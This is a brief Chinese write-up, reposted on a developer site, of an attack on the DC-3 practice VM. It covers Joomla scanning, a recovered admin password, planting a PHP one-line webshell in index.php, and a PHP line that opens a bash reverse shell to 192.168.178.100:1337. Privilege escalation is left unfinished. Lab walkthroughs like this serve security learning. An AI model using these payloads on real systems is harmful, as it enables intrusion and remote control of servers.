| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 开发工具 -> dc-3 简单复现 -> 正文阅读 |
|
[开发工具]dc-3 简单复现 |
DC-3 复现 本次复现暂未成功,由于最终的提权脚本位置似乎变了,就只分享一下到最后利用溢出漏洞之前的过程中个人的体会 信息搜集: 拿到靶机后设置完NAT后就开始信息搜集了
第一个漏洞:
知道cms是joomla,知道这款cms有相应的漏洞扫描器:joomscan
得到密码:snoopy 登陆查看是否有上传点:在扩展里面找到可以上传文件的地方 在index.php上加入一个一句话,蚁剑成功连接:
补充:也可以利用weevely获取网站webshell,并再次基础上直接搜索溢出漏洞进行提权,蚁剑无法与
利用bash进行反弹shell
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.178.100/1337 0>&1' "); ?> 对于此反弹shell的理解
其中 >1.txt ,表示1.txt替换原来的内容 执行getshell文件达到监听目的 使用netcat监听1337端口(可以利用netcat打开本地随意端口利用)
补充:相关其他反弹shell的方法:反弹shell详解 尝试利用服务器自生存在的漏洞即溢出漏洞
之后下载完exp,利用即可得到root权限 |
|
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/16 5:57:40- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |